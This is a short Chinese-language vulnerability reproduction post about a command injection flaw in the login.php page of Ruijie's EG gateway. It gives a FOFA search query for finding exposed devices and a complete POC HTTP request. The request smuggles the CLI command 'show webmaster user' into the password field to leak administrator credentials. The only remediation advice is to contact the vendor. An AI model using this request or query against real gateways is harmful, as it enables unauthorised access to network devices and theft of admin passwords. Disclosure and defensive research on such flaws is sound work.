【漏洞复现】锐捷EG易网关login.php命令注入漏洞

Nx01 产品简介

        锐捷EG易网关是一款综合网关，由锐捷网络完全自主研发。它集成了先进的软硬件体系架构，配备了DPI深入分析引擎、行为分析/管理引擎，可以在保证网络出口高效转发的条件下，提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。

Nx02 漏洞描述

        锐捷EG易网关login.php存在 CLI命令注入，导致管理员账号密码泄露漏洞。

Nx03 产品主页

fofa-query: app="Ruijie-EG易网关" && body="/login.php?a=version"

Nx04 漏洞复现

POC：

1. POST /login.php HTTP/1.1
2. Host: {{Hostname}}
3. User-Agent: Go-http-client/1.1
4. Content-Length: 52
5. Content-Type: application/x-www-form-urlencoded
6. X-Requested-With: XMLHttpRequest
7. Accept-Encoding: gzip
9. username=admin&password=a?show+webmaster+user

Nx05 修复建议

建议联系软件厂商进行处理。